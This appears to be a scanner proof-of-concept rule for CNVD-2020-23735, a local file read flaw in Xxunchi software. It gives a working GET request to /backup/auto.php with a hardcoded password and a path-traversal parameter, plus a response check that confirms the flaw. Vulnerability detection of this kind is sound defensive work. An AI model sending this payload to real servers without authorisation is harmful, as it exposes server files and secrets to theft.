id: CNVD-2020-23735

info:
    name: Xxunchi Local File read
    author: 清风明月(www.secbook.info)
    severity: high

rules:
    r0:
        request:
            method: GET
            path: /backup/auto.php?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php
            headers:
                Accept-Encoding: deflate
        expression: response.status == 200 && response.body.bcontains(bytes(string("NzbwpQSdbY06Dngnoteo2wdgiekm7j4N"))) && response.body.bcontains(bytes(string("display_errors")))
expression: r0()

